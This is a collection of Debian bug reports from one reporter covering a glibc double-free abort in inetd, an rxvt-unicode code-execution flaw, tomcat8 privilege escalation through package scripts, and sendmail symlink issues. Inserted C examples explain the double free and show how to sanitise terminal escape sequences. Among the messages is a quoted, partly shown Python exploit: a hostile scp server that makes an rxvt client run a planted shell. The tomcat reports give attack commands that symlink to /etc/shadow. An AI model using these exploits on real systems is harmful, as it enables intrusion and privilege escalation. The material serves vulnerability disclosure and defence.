Bug#1041836: libc6 2.36-9+deb12u1 double free abort

2023-08-09 Thread Paul Szabo
I now tried the idea whether the amount of memory in the machine has a
relevance to my "inetd: double free detected in tcache 2, abort" issue.
I tried "mem=8G" and similar as kernel boot parameter; that produced
more-or-less the expected results for memory shown by "free", but did
not help to fix the issue. I may try to change physical RAM modules,
not sure whether I have suitable replacements.

Cheers, Paul
-- 
Paul Szabo   p...@maths.usyd.edu.au   www.maths.usyd.edu.au/u/psz
School of Mathematics and Statistics   University of Sydney   Australia



Bug#1041836: root unable to write un-owned

2023-08-09 Thread Paul Szabo
Bummer. This last "echo x > /tmp/x" issue is probably the result of
protected_regular being set in kernel configs, see
https://docs.kernel.org/admin-guide/sysctl/fs.html#id12

Sorry about the noise. (Hangs head in shame.)

Cheers, Paul



Bug#1041836: root unable to write un-owned

2023-08-09 Thread Paul Szabo
Another oddity that should never happen: root cannot write a file
that he does not own. Demonstration (root running bash):

  root# touch /tmp/x
  root# ls -l /tmp/x
  -rw-r--r-- 1 root root 0 Aug 10 09:39 /tmp/x
  root# echo a > /tmp/x
  root# chown 2:2 /tmp/x
  root# ls -l /tmp/x
  -rw-r--r-- 1 bin bin 2 Aug 10 09:39 /tmp/x
  root# echo b > /tmp/x
  -bash: /tmp/x: Permission denied
  root# chown 0:0 /tmp/x
  root# ls -l /tmp/x
  -rw-r--r-- 1 root root 2 Aug 10 09:39 /tmp/x
  root# echo c > /tmp/x

This issue seems to reproduce on all machines where I tried.
Quite possibly unrelated (so I may cop some flak) ... or maybe
these "impossible" happenings have a common cause?

Cheers, Paul



Bug#1041836: libc6 2.36-9+deb12u1 double free abort

2023-08-09 Thread Paul Szabo
Dear Aurelien,

I used LD_PRELOAD=libc_malloc_debug.so for MALLOC_CHECK_. With those
extra checks (tried all values of MALLOC_CHECK_ from 0 to 20), glibc
did not show any errors, suggesting that the bug is not in inetd.

The original poster said his issue shows on some hardware only.
I observed my issue on a wider range of CPUs: present on Xeon4309Y,
Xeon6326 and i7-8700, but not on i7-4790, i5-4570, i5-3470, N5105 or
x5-Z8350. Maybe the difference is in the RAM of the machine? Those
with my issue have 16GB or more, those without have 8GB or less. 

Cheers, Paul



Bug#1041836: libc6 2.36-9+deb12u1 double free abort

2023-08-08 Thread Paul Szabo
Maybe related: seems that the default for "mcheck" or MALLOC_CHECK_ has
changed.

I observe an oddity. I only noticed this recently, with libc6 version
2.36-9+deb12u1; reverting to previous 2.36-9 did not seem to help.

The issue. Sending SIGHUP to the inetd(8) process should cause it to
re-load its configuration, but instead it elicits

  free(): double free detected in tcache 2

and an abort. This is easiest seen (after "systemctl stop inetd") with

  root# inetd -d -i & sleep 1; kill -HUP $!; sleep 1; jobs
  [1] 2431
  ADD: ident proto=tcp4, wait.max=1.256 user:group=identd:(default) builtin=0 server=/usr/sbin/identd
  free(): double free detected in tcache 2
  [1]+  Aborted                 inetd -d -i
  root# 

Sanity(?) is restored by using MALLOC_CHECK_=0 (needs LD_PRELOAD):

  root# LD_PRELOAD=libc_malloc_debug.so MALLOC_CHECK_=0 inetd -d -i & sleep 1; kill -HUP $!; sleep 1; jobs; kill $!; sleep 1; jobs
  [1] 2437
  ADD: ident proto=tcp4, wait.max=1.256 user:group=identd:(default) builtin=0 server=/usr/sbin/identd
  REDO: ident proto=tcp4, wait.max=1.256 user:group=identd:(default) builtin=0 server=/usr/sbin/identd
  [1]+  Running                 LD_PRELOAD=libc_malloc_debug.so MALLOC_CHECK_=0 inetd -d -i &
  [1]+  Done                    LD_PRELOAD=libc_malloc_debug.so MALLOC_CHECK_=0 inetd -d -i
  root# 

To compound the oddity, the value of MALLOC_CHECK_ or even its presence
seems ignored, just the LD_PRELOAD=libc_malloc_debug.so "fixes" the
issue.

Hope this helps to find the cause.

Cheers, Paul


References:
http://btorpey.github.io/blog/2019/07/14/memory-checking/
https://www.gnu.org/software/libc/manual/html_node/Heap-Consistency-Checking.html


-- 
Paul Szabo   p...@maths.usyd.edu.au   www.maths.usyd.edu.au/u/psz
School of Mathematics and Statistics   University of Sydney   Australia

Join the Union and fight for a better University: www.nteu.au/join
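
The abort quoted above comes from the tcache double-free check in glibc's free(); the text "tcache 2" is part of the literal message, not a count. The C program below is added here as an illustration and is not taken from the bug report or from inetd: it reproduces that check in a forked child so that the demonstrating process survives the abort, and contrasts it with the corrected free pattern. Two facts are worth keeping beside the transcripts: since glibc 2.34, MALLOC_CHECK_ (like mcheck and mtrace) is implemented in libc_malloc_debug.so and is ignored unless that library is preloaded; and preloading it swaps in that library's own malloc and free, so the failure disappearing under LD_PRELOAD shows only that a different free path handled the call, not that the double free is gone.

```c
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Parking the pointer in a volatile global stops the compiler from deleting the
 * malloc/free pair as dead code, so the frees below really reach the allocator. */
static void *volatile escaped;

/* Run fn() in a forked child. Returns the signal that killed the child, 0 if it
 * exited normally, -1 if fork/wait failed. The abort never reaches the caller. */
static int run_in_child(void (*fn)(void))
{
    int status = 0;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        fn();
        _exit(0);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}

/* The bug class reported for inetd: a small chunk freed twice in a row. The first
 * free() parks it in the tcache bin for its size; the second free() finds it there,
 * prints "free(): double free detected in tcache 2" on stderr and calls abort(). */
static void double_free(void)
{
    char *p = malloc(64);
    if (!p)
        _exit(2);
    memset(p, 'A', 63);
    p[63] = '\0';
    escaped = p;
    free(escaped);
    free(escaped);            /* BUG: the same pointer freed again */
}

/* The corrected pattern: the stale pointer is cleared after the free, and
 * free(NULL) is defined to do nothing, so a second pass over it is harmless. */
static void single_free(void)
{
    char *p = malloc(64);
    if (!p)
        _exit(2);
    memset(p, 'A', 63);
    p[63] = '\0';
    escaped = p;
    free(escaped);
    escaped = NULL;
    free(escaped);
}

int double_free_signal(void) { return run_in_child(double_free); }
int single_free_signal(void) { return run_in_child(single_free); }

int main(void)
{
    int s1 = double_free_signal();
    int s2 = single_free_signal();
    printf("double free: child killed by signal %d%s\n", s1, s1 == SIGABRT ? " (SIGABRT)" : "");
    printf("single free: child %s\n", s2 == 0 ? "exited normally" : "died");
    return 0;
}
```

Running it shows the glibc message on stderr followed by the parent's report; signal 6 is SIGABRT. The test only asserts that the double-free child died by a signal, because other allocators (musl, macOS libmalloc) catch the same double free but terminate the process differently.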



Bug#988763: rxvt-unicode: Remote(?) code execution via ESC G Q

2021-05-21 Thread Paul Szabo
Dear Ryan,

I just wrote:

  Curious that you do not consider this a bug: similar things were fixed
  in other terminal emulators like xterm, so people could "safely" view
  (i.e. cat or grep) any files, e.g. root perusing syslog.

I guess I should have given examples or references. Some that come to
mind:

  www.debian.org/security/2003/dsa-380
  www.debian.org/security/2009/dsa-1694
  bugs.debian.org/511516

Anyway, I solved my problem by "apt purge rxvt-unicode" on all my
machines.

Cheers, Paul
-- 
Paul Szabo   p...@maths.usyd.edu.au   www.maths.usyd.edu.au/u/psz
School of Mathematics and Statistics   University of Sydney   Australia

I support NTEU members taking a stand for workplace rights in the face of
poorly-run change management. Visit www.nteu.org.au/sydney to learn more.



Bug#988763: rxvt-unicode: Remote(?) code execution via ESC G Q

2021-05-21 Thread Paul Szabo
Dear Ryan,

Curious that you do not consider this a bug: similar things were fixed
in other terminal emulators like xterm, so people could "safely" view
(i.e. cat or grep) any files, e.g. root perusing syslog.

Looking at the further message on FullDisclosure:
  https://seclists.org/fulldisclosure/2021/May/51
(quoted below for completeness), it seems that this is now fixed
upstream in version 9.25, maybe they did consider it a bug.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   www.maths.usyd.edu.au/u/psz
School of Mathematics and Statistics   University of Sydney   Australia


Quoting message:

From: def 
To: 
Date: Thu, 20 May 2021 04:38:34 +0300
Subject: Re: [FD] (u)rxvt terminal (+bash) remoteish code execution 0day

Minor clarifications and additional details for the post.

First and foremost, this vulnerability is not technically a zero-day for
rxvt-unicode since the bug has been independently discovered & publicly
discussed at oss-security at least in 2017:

https://www.openwall.com/lists/oss-security/2017/05/01/20

Upstream patched the vulnerability silently back in 2017. According to
rxvt-unicode commit messages and changelog entries, the vulnerability
was considered to have minor "security implications" explaining why it
never was considered critical enough to backport to old Linux distros.
Moreover, the first patched version is rxvt-unicode 9.25 (2021-05-14)
released barely a couple of weeks ago. Therefore, most Linux distros
still ship *unpatched* rxvt-unicode 9.22 (2016-05-14). Yes, 9.23 & 9.24
version numbers do not exist because they were skipped in the upstream.

Nonetheless the exploit remains 0day (i.e., no upstream patch available)
for at least the following rxvt forks and derivatives.

 - rxvt 2.7.10  (the original rxvt terminal)
 - mrxvt 0.5.4  (unmaintained rxvt terminal with tabs)
 - aterm 1.0.1  (random rxvt-based terminal from Debian "jessie" repos)
 - eterm 0.9.7  (Enlightenment

Finally, the vulnerability can be exploited in any context in which the
attacker can plant payload scripts in a subdirectory of CWD and trigger
code execution by writing (unescaped) ANSI escape sequences to stdout or
stderr. Suitable target programs besides `scp` include popular CLI tools
like `unrar` and `busybox tar` as demonstrated in the PoCs here:

https://huumeet.info/~def/rxvt0day/

Note that GNU tar is not exploitable due to properly escaped filenames.

- def
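
The clarification above notes that GNU tar is not exploitable because it escapes file names before printing them, and the PoC quoted in the original report further down shows which sequences matter. As an added example, not part of rxvt-unicode or of def's code, here is the minimal defensive layer a CLI tool can put between untrusted bytes (file names from a remote scp server, archive members, log lines) and the terminal: a renderer that shows control bytes in caret notation the way cat -v does, and a detector for sequences that make the terminal answer on its own input. The sample payload is the PoC's escape string, constructed here as a byte string; the list of reply-provoking sequences is illustrative, not exhaustive.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The PoC's payload, constructed here as a byte string: leave VT52 mode, DECID,
 * re-enter ANSI mode, then rxvt's ESC G Q graphics query. */
const char kRxvtPayload[] = "\x1b[?2l\x1bZ\x1b<\x1bGQ";
#define kRxvtPayloadLen (sizeof kRxvtPayload - 1)

/* Render control bytes in caret notation (as cat -v does): ESC -> ^[, NUL -> ^@,
 * DEL -> ^?. Newline and tab are kept since they cannot start an escape sequence;
 * bytes >= 0x80 pass through so UTF-8 survives. Returns the number of bytes
 * written (excluding the terminating NUL), or -1 if out is too small. */
int sanitize_for_terminal(const char *in, size_t n, char *out, size_t outsz)
{
    size_t o = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)in[i];
        if (c == '\n' || c == '\t' || (c >= 0x20 && c != 0x7f)) {
            if (o + 1 >= outsz)
                return -1;
            out[o++] = (char)c;
        } else {
            if (o + 2 >= outsz)
                return -1;
            out[o++] = '^';
            out[o++] = (char)(c == 0x7f ? '?' : c + 0x40);
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* Sequences after which a terminal writes a reply to its own input. Whoever gets
 * them onto the screen gets text typed into whatever reads stdin next (the shell,
 * in the bug report). Illustrative list, not complete. */
static const char *const kReplyProvoking[] = {
    "\x1bGQ",   /* rxvt: graphics query, answered with a newline-terminated reply */
    "\x1bZ",    /* DECID / VT52 identify: terminal sends its identification */
    "\x1b[c",   /* DA: primary device attributes */
    "\x1b[6n",  /* CPR: cursor position report */
    NULL
};

/* Returns the offset of the first reply-provoking sequence in in[0..n), or -1. */
int find_terminal_query(const char *in, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if ((unsigned char)in[i] != 0x1b)
            continue;
        for (int k = 0; kReplyProvoking[k]; k++) {
            size_t len = strlen(kReplyProvoking[k]);
            if (i + len <= n && memcmp(in + i, kReplyProvoking[k], len) == 0)
                return (int)i;
        }
    }
    return -1;
}

int main(void)
{
    char out[128];
    const char fname[] = "ZZZ/\x1bGQ";   /* a file name a hostile scp server could send */
    int n = sanitize_for_terminal(kRxvtPayload, kRxvtPayloadLen, out, sizeof out);
    printf("payload rendered safely: %s (%d bytes)\n", out, n);
    printf("first reply-provoking sequence in payload at offset %d\n",
           find_terminal_query(kRxvtPayload, kRxvtPayloadLen));
    printf("file name \"%s\": query at offset %d\n",
           (sanitize_for_terminal(fname, sizeof fname - 1, out, sizeof out), out),
           find_terminal_query(fname, sizeof fname - 1));
    return 0;
}
```

Escaping is the right layer for anything the tool is going to print; the detector is for the case where the tool should refuse or log the input instead (an scp client rejecting such a file name). Neither replaces the fix in the terminal itself, which the quoted message says arrived in rxvt-unicode 9.25.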



Bug#988763: rxvt-unicode: Remote(?) code execution via ESC G Q

2021-05-19 Thread Paul Szabo
Package: rxvt-unicode
Version: 9.22-6
Severity: grave
Tags: security upstream
Justification: user security hole

Dear Maintainer,

Please see message on Full-Disclosure mailing list:
  https://seclists.org/fulldisclosure/2021/May/33
(quoted below, for completeness).

Please fix.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   www.maths.usyd.edu.au/u/psz
School of Mathematics and Statistics   University of Sydney   Australia


Quoting message:

From: def 
To: 
Date: Sun, 16 May 2021 15:32:48 +0300
Subject: [FD] (u)rxvt terminal (+bash) remoteish code execution 0day

#!/usr/bin/env python
# Title: rxvt (remote) code execution over scp with $SHELL=/bin/bash (0day)
# Version: rxvt 2.7.10, rxvt-unicode 9.22
# Author: def 
# Date: 2021-05-16
# CVE: N/A
#
#--
# (U)RXVT VULNERABILITY
#
# In rxvt-based terminals, ANSI escape sequence ESC G Q (\eGQ, \033GQ, \x1bGQ)
# queries the availability of graphics and the response is received from stdin.
# However, rxvt responds to the query with a newline-terminated message, which
# is retarded and exposes goatse-wide gaping security holes in many popular CLI
# programs when executed inside an rxvt terminal window.
#
# [def@arch ~]$ printf '\eGQ'
# ^[G0
# [def@arch ~]$ 0
# bash: 0: command not found
#
# The latter command (i.e., 0) executes automatically without user interaction.
# The contents of the second command can be somewhat controlled by chaining the
# printf message with other escape sequences. In particular, a VT52 mode escape
# sequence \eZ prepends a letter Z and triggers bash's tab completion, allowing
# the construction of relative paths and, therefore, code execution in the form
# of running (planted) files from subdirectories in the current directory.
#
# URXVT (+BASH) CODE EXECUTION PROOF-OF-CONCEPT ---
#
# % mkdir -p ZZZ && echo 'uname -a; id; date; sh -i' >ZZZ/0 && chmod +x ZZZ/0
# % urxvt -e bash
#
# [def@arch ~]$ printf '\e[?2l\eZ\e<\eGQ'
# ^[/Z^[G0
# [def@arch ~]$ ZZZ/0
# Linux 5.11.1-arch-1 #1 SMP PREEMPT Tue, 23 Feb 2021 14:05:30 x86_64 GNU/Linux
# uid=1000(def) gid=1001(def) groups=1001(def),43(tor),998(wheel),999(adm)
# Sun Apr 18 04:25:22 AM EEST 2021
# sh-5.1$
#
# FIX -
#
# Don't use rxvt or any of its derivatives. Stay the fuck away from xterm also.
#
# st(1) is a viable solution if you ever plan to `cat /var/log/access.log` or
# otherwise handle untrusted data from questionable sources.
#
#--

import logging
import paramiko
import socket
import threading
logging.basicConfig(level=logging.INFO)

"""
This script implements a scp server that exploits insecure ANSI escape sequence
handling in client's (u)rxvt terminal (and bash shell). A recursive (-r) copy
into the current directory leads to code execution. For example:


$ scp -r -P user@localhost:/backup/or/whatever/ .

The above command transfers payload files ZZZ/0, ZZZ/1 and ZZZ/Z0 to the client
and executes one of them (the executed payload depends on the rxvt version).
"""

bind = ('localhost', )
payload = '#!/bin/sh\nuname -a; id; date; sh -i\n'

class ScpExploitServer(paramiko.ServerInterface):
    def __init__(self):
        self.event = threading.Event()

    def get_allowed_auths(self, username):
        return "password"

    def check_auth_none(self, username):
        logging.info('Authenticating as %s', username)
        return paramiko.AUTH_SUCCESSFUL

    def check_auth_password(self, username, password):
        logging.info('Authenticating with %s:%s', username, password)
        return paramiko.AUTH_SUCCESSFUL

    def check_channel_request(self, kind, chanid):
        logging.info('Opening %s channel %d', kind, chanid)
        if kind != "session":
            return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
        return paramiko.OPEN_SUCCEEDED

    def check_channel_exec_request(self, channel, command):
        chanid, command = channel.get_id(), command.decode('ascii')
        logging.info('Approving channel %d exec request: %s', chanid, command)
        parts = command.split()
        assert len(parts) > 2 and parts[0] == 'scp' and '-f' in parts
        threading.Thread(target=self.exploit, args=[channel]).start()
        return True

    def exploit(self, channel):
        def wait(): assert channel.recv(4096) == b'\x00'
        def send(): channel.sendall(b'\x00')
        fdir, fname0, fname1, fname2 = 'ZZZ', '0', '1', 'Z0'
        wait()

        # (1) Create subdirectory './ZZZ/'
        logging.info('Enter

Bug#956084: inetutils-telnetd: CVE-2020-10188

2020-04-06 Thread Paul Szabo
Package: inetutils-telnetd
Severity: critical
Tags: security
Justification: root security hole

Looking in https://security-tracker.debian.org/tracker/CVE-2020-10188 :

  utility.c in telnetd in netkit telnet through 0.17 allows remote
  attackers to execute arbitrary code via short writes or urgent data,
  because of a buffer overflow involving the netclear and nextitem
  functions.

Seems to me that inetutils contains the same (vulnerable) utility.c
functions. Please check.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   www.maths.usyd.edu.au/u/psz
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845393: Pending fixes for bugs in the tomcat8 package

2016-12-02 Thread paul . szabo
Dear Emmanuel,

The two directories
  /etc/tomcat8/Catalina
  /etc/tomcat8/Catalina/localhost
have similar ownership and permissions, but they are set up differently:
localhost is "delivered" writable, while Catalina is delivered without
but is then set so in postinst (and re-set at each upgrade). This seems
confusing. Would it be worthwhile to handle them both in the same way?
Maybe some other things in postinst could get the same treatment.
(Simple is easier to keep secure.)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845393: Pending fixes for bugs in the tomcat8 package

2016-12-01 Thread paul . szabo
Dear Emmanuel,

(Yes I had tomcat6, then went to tomcat8, skipping tomcat7; and have
inherited things.)

You seem to say that  /etc/tomcat8/Catalina/localhost  does not need to
be writable by tomcat8, setting it so was useless (thus wrong).
What about the  /etc/tomcat8/Catalina  directory, is there a need to set
it writable? Is there a need to have these owned by group tomcat8, could
they be left as root:root and world-accessible?

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845393: Pending fixes for bugs in the tomcat8 package

2016-12-01 Thread paul . szabo
Dear Emmanuel,

Sorry for my previous outbursts. I was wrong.

Your fix (chmod-ing just Catalina, not localhost) is fine: if you do not
chmod localhost, then there is no issue even if localhost is replaced by
a symlink pointing somewhere.

However... will tomcat still "work"? On my machine, I have one XML file
  /etc/tomcat8/Catalina/localhost/mapleta.xml
in there, for the one application(?) that is installed. I guess it was
tomcat that put it there: then tomcat needs write access to localhost.

Maybe /etc/tomcat8/Catalina/localhost is to be "delivered" writable from
the DEB package, the ownership only to be fixed in postinst? In the
current DEB, that directory is not group-writable.

Could you kindly explain how this all works.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845393: Pending fixes for bugs in the tomcat8 package

2016-12-01 Thread paul . szabo
Hmm... I just accused you of being mistaken... but maybe it is I
who is wrong. - Now thinking it through again.

Cheers, Paul



Bug#845393: Pending fixes for bugs in the tomcat8 package

2016-12-01 Thread paul . szabo
Dear Emmanuel,

>> The bug depends on "Catalina" being writable; the permissions on
>> "localhost" are irrelevant.
>
> The postinst script no longer runs chmod 755 on the localhost directory.
> If I'm not mistaken this fixes the issue you reported.
>
> https://anonscm.debian.org/cgit/pkg-java/tomcat8.git/commit/?id=02570d6
>
> The script still chmods the Catalina directory but this one can't be
> replaced by a symlink.

You are mistaken. Please re-read the original bug report.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845393: marked as done (Privilege escalation via upgrade)

2016-12-01 Thread paul . szabo
reopen 845393
thanks

Not done. Please fix proper.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845393: Pending fixes for bugs in the tomcat8 package

2016-12-01 Thread paul . szabo
Dear Emmanuel,

> No longer make /etc/tomcat8/Catalina/localhost writable ...

The bug depends on "Catalina" being writable; the permissions on
"localhost" are irrelevant.

Please re-open.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845385: Privilege escalation via removal

2016-11-30 Thread paul . szabo
Emmanuel wrote:

>> Might protect against "static" things, but vulnerable to a race.
> I'm not sure to understand, what kind of race could happen here?

Hmm... You suggested some chmod before chown. Your attacker sits tight,
waits for the chmod, then creates the "bad thing" in readiness for your
chown. The chmod takes time to complete, the chown takes time to get up
and start: plenty of time in between for the attacker to act.

>> But really... why do you care about leaving some "dangling" useless
>> object, owned by some long-gone UID or GID?
>
> I don't know the motivations behind this complexity. I can imagine a
> case where an administrator switches from tomcat8 to tomcat9 and doesn't
> expect the old package to remove files unknown to him so they can be
> moved to the configuration directory of the new package.
>
> The upgrade scenario could look like this:
>
> 1. Install tomcat8
> 2. Declare a web application in /etc/tomcat8/Catalina/localhost
> 3. Uninstall tomcat8
> 4. Install tomcat9
> 5. Move /etc/tomcat8/Catalina/localhost/* to /etc/tomcat9/Catalina/localhost
>
> If the step 3 also removes the webapp configuration the administrator is
> going to be angry (but arguably less than having his system hacked).

You misunderstood. Do not remove things in "step 3": leave alone, do not
chown. (Remove the chown from your script.) Leave it being owned by the
tomcat8 UID, not bother that the UID will be "gone" and un-named.

>> Then if the tomcat8 package is removed (purged?), the postrm script runs
>>   chown -Rhf root:root /etc/tomcat8/
>> and that will leave the file world-writable, setgid root
>
> What about switching the files left to nobody:nogroup instead of
> root:root? That would be less disruptive for the stable and oldstable
> updates than removing /etc/tomcat8 completely.

That would be less dangerous, but still wrong; would still be privilege
escalation, though to a less useful entity.

---

Markus wrote:

>>> Then if the tomcat8 package is removed (purged?), the postrm script runs
>>>   chown -Rhf root:root /etc/tomcat8/
>>> and that will leave the file world-writable, setgid root
>>
>> What about switching the files left to nobody:nogroup instead of
>> root:root? That would be less disruptive for the stable and oldstable
>> updates than removing /etc/tomcat8 completely.
>
> I guess just removing /etc/tomcat8/Catalina would be an option too. As
> far as I know nothing else requires it to be present after the removal
> of Tomcat. If there were applications with such a dependency we should
> take a look at them.

Yes you could "forcibly" remove /etc/tomcat8/Catalina. But then, just
remove all of /etc/tomcat8 so there is definitely nothing left to chown.

---

I now notice a typo in your postrm script. It has lines like:

if [ -d /var/lib/tomcat8/common ] && [ -z "`(find var/lib/tomcat8/common/classes -type f)`" ] ; then

and are missing a "/" in front of "var". (Of course the "if" are
superfluous, just do the "rmdir".)

---

I now notice that the Debian bug contraption does not CC me on messages:
just being the submitter does not add you to the CC list, you need to
explicitly "subscribe". So I missed a number of intermediate messages.

---

Markus wrote previously:

> ... Besides all tomcat processes are killed on purge.

Where does that happen? I do not think that is true.

Neither are any possible setuid-tomcat8 or setgid-tomcat8 files removed.

---

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845385: Privilege escalation via removal

2016-11-22 Thread paul . szabo
Dear Emmanuel,

> Do you think running something like "chmod -R 640 /etc/tomcat8" right
> before the chown is an appropriate solution to this issue?

Might protect against "static" things, but vulnerable to a race.

Your postrm script might want to kill all tomcat8 processes, also.
That might be a "good thing": deluser or delgroup might not "work"
with left-over, running processes; and might protect against a race.

But really... why do you care about leaving some "dangling" useless
object, owned by some long-gone UID or GID?

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845393: Privilege escalation via upgrade

2016-11-22 Thread Paul Szabo
Package: tomcat8
Version: 8.0.14-1+deb8u4
Severity: critical
Tags: security

Having installed tomcat8, the directory /etc/tomcat8/Catalina is set
writable by group tomcat8, as per the postinst script. Then the tomcat8
user, in the situation envisaged in DSA-3670 and DSA-3720, see also
  http://seclists.org/fulldisclosure/2016/Oct/4
could use something like commands
  mv -i /etc/tomcat8/Catalina/localhost /etc/tomcat8/Catalina/localhost-OLD
  ln -s /etc/shadow /etc/tomcat8/Catalina/localhost
to create a symlink:
  # ls -l /etc/tomcat8/Catalina/localhost
  lrwxrwxrwx 1 tomcat8 tomcat8 11 Nov 23 10:19 /etc/tomcat8/Catalina/localhost 
-> /etc/shadow
Then when the tomcat8 package is upgraded (e.g. for the next DSA),
the postinst script runs
  chmod 775 /etc/tomcat8/Catalina /etc/tomcat8/Catalina/localhost
and that will make the /etc/shadow file world-readable (and
group-writable). Other useful attacks might be to make the objects:
  /root/.Xauthority
  /etc/ssh/ssh_host_dsa_key
world-readable; or make something (already owned by group tomcat8)
group-writable (some "policy" setting maybe?).

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#845385: Privilege escalation via removal

2016-11-22 Thread Paul Szabo
Package: tomcat8
Version: 8.0.14-1+deb8u4
Severity: critical
Tags: security

Having installed tomcat8, the directory /etc/tomcat8/Catalina is set
writable by group tomcat8, as per the postinst script. Then the tomcat8
user, in the situation envisaged in DSA-3670 and DSA-3720, see also
  http://seclists.org/fulldisclosure/2016/Oct/4
could use something like commands
  touch /etc/tomcat8/Catalina/attack
  chmod 2747 /etc/tomcat8/Catalina/attack
to create a file:
  # ls -l /etc/tomcat8/Catalina/attack
  -rwxr-Srwx 1 tomcat8 tomcat8 0 Nov 23 09:00 /etc/tomcat8/Catalina/attack
Then if the tomcat8 package is removed (purged?), the postrm script runs
  chown -Rhf root:root /etc/tomcat8/
and that will leave the file world-writable, setgid root:
  # ls -l /etc/tomcat8/Catalina/attack
  -rwxr-Srwx 1 root root 0 Nov 23 09:00 /etc/tomcat8/Catalina/attack
allowing "group root" access to the world.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#841257: sendmail: Privilege escalation from group smmsp to (user) root

2016-11-09 Thread paul . szabo
Dear Andreas,

> I have a completely untested patch sitting in GIT - do you have a
> possibility to test packages built from that?

I could replace files, or DEB packages, on some test machines. Do not
know whether that testing would be exhaustive: do not know how many
features of the sendmail package I use. Or if the changes are "small"
then could just inspect.

Cheers, Paul



Bug#841257: sendmail: Privilege escalation from group smmsp to (user) root

2016-10-18 Thread paul . szabo
Hmm (again) ... Maybe file /usr/share/sendmail/sendmail needs updating
also? It is almost identical to /etc/init.d/sendmail, and in file
/etc/cron.daily/sendmail I notice the lines:

...
#--
# Every so often, give sendmail a chance to run the MSP queues.
*/20 * * * *   smmsp   test -x /etc/init.d/sendmail && /usr/share/sendmail/sendmail cron-msp
#
#--
# Every so often, give sendmail a chance to run the MTA queues.
# Will also run MSP queues if enabled
#*/10 * * * *  root    test -x /etc/init.d/sendmail && /usr/share/sendmail/sendmail cron-mta
...

Maybe no problem as long as that second line is commented out.

I wonder about the first line (whether it is needed), seeing how my
machines always have a process like:

USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
smmsp     2880  0.0  0.0  11956  3236 ?        Ss   Oct11   0:00 sendmail: Queue runner@00:10:00 for /var/spool/mqueue-client

running.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#841257: sendmail: Privilege escalation from group smmsp to (user) root

2016-10-18 Thread paul . szabo
Hmm... you may also need to (once) do:
  chown smmsp /var/run/sendmail/stampdir/reload
when adopting my patch.

Cheers, Paul



Bug#841257: sendmail: Privilege escalation from group smmsp to (user) root

2016-10-18 Thread Paul Szabo
Package: sendmail
Version: 8.14.4-8+deb8u1
Severity: grave
Tags: patch security
Justification: user security hole


Supposing that due to some bug in sendmail, we were able to execute
commands as group smmsp, then that might be leveraged to cause root
to create any (empty) file.

The directory /var/run/sendmail/stampdir is group-smmsp-writable, so
we (as group smmsp) could create symlinks there pointing to any name.
Then when /etc/init.d/sendmail was run as root (to restart the daemon
maybe?), one or another of the symlinks

  /var/run/sendmail/stampdir/reload
  /var/run/sendmail/stampdir/cron_msp
  /var/run/sendmail/stampdir/cron_mta
  /var/run/sendmail/stampdir/cron_msp

might be followed to create an empty file.

Lines in /etc/init.d/sendmail:

   ...
   110  SENDMAIL_ROOT='/var/run/sendmail';
   ...
   144  STAMP_DIR="${SENDMAIL_ROOT}/stampdir";
   ...
   246  touch $STAMP_DIR/reload;
   ...
   367  touch $STAMP_DIR/reload;
   ...
   900  touch $STAMP_DIR/cron_msp;
   ...
   912  touch $STAMP_DIR/cron_mta;
   ...
   938  touch $STAMP_DIR/cron_msp;
   ...
  1130  if [ ! -d "${STAMP_DIR}" ]; then
  1131  mkdir -p "${STAMP_DIR}";
  1132  chown root:smmsp "${STAMP_DIR}";
  1133  chmod 02775 "${STAMP_DIR}";
  1134  fi;
   ...


Things missing to make a "convincing" exploit:
 - a way to "get" group smmsp: there have not been such issues for some
   years now;
 - how to trick the sysadmin into restarting sendmail;
 - under what conditions would any of those "touch" lines be run;
 - a way to "get root" by creating some empty file: damage can be done
   with /etc/nologin, maybe some exploitation with /etc/hosts.deny.
Seems this issue has low priority.


My suggested fix:

$ diff /etc/init.d/sendmail.bak <---> /etc/init.d/sendmail
246c246
<   touch $STAMP_DIR/reload;
